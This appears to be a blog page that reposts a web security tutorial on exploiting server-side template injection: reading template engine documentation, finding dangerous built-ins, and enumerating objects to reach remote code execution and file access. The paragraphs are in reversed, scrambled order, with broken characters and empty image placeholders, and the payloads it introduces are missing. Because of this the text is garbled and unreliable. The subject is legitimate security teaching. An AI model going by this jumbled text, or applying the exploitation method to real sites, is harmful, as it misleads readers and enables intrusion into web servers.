As these objects can vary between different templates within the same website, be aware that you might need to study an object's behavior in the context of each distinct template before you find a way to exploit it. ![]() You should pay particular attention to these non-standard objects because they are especially likely to contain sensitive information or exploitable methods. It is important to note that websites will contain both built-in objects provided by the template and custom, site-specific objects that have been supplied by the web developer. Additionally, for Burp Suite Professional users, the Intruder provides a built-in wordlist for brute-forcing variable names. This can form the basis for creating a shortlist of potentially interesting objects and methods to investigate further. For example, in Java-based templating languages, you can sometimes list all variables in the environment using the following injection: If such an object exists, you can potentially use it to generate a list of objects that are in scope. Many template engines expose a "self" or "environment" object of some kind, which acts like a namespace containing all objects, methods, and attributes that are supported by the template engine. If not, the next step is to explore the environment and try to discover all the objects to which you have access. PRACTITIONER Server-side template injection in an unknown language with a documented exploit ExploreĪt this point, you might have already stumbled across a workable exploit using the documentation. The warning may not provide much detail, but at the very least it should flag this particular built-in as something to investigate.įor example, in ERB, the documentation reveals that you can list all directories and then read arbitrary files as follows: ![]() This can be an invaluable resource, even acting as a kind of cheat sheet for which behaviors you should look for during auditing, as well as how to exploit them.Įven if there is no dedicated "Security" section, if a particular built-in object or function can pose a security risk, there is almost always a warning of some kind in the documentation. The name of this section will vary, but it will usually outline all the potentially dangerous things that people should avoid doing with the template. In addition to providing the fundamentals of how to create and use templates, the documentation may also provide some sort of "Security" section. PRACTITIONER Basic server-side template injection (code context) Read about the security implications In an unsandboxed environment, achieving remote code execution and using it to read, edit, or delete arbitrary files is similarly as simple in many common template engines. For example, once you know that the Python-based Mako template engine is being used, achieving remote code execution could be as simple as: Even something as simple as learning how to embed native code blocks in the template can sometimes quickly lead to an exploit. Learning the basic syntax is obviously important, along with key functions and handling of variables. While this may not be the most exciting way to spend your time, it is important not to underestimate what a useful source of information the documentation can be. Unless you already know the template engine inside out, reading its documentation is usually the first place to start. ![]() Once you discover a server-side template injection vulnerability, and identify the template engine being used, successful exploitation typically involves the following process. By putting this process into practice, you can potentially discover and exploit a variety of different server-side template injection vulnerabilities. In this section, we'll look more closely at some typical server-side template injection vulnerabilities and demonstrate how they can be exploited using our high-level methodology. Exploiting server-side template injection vulnerabilities
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |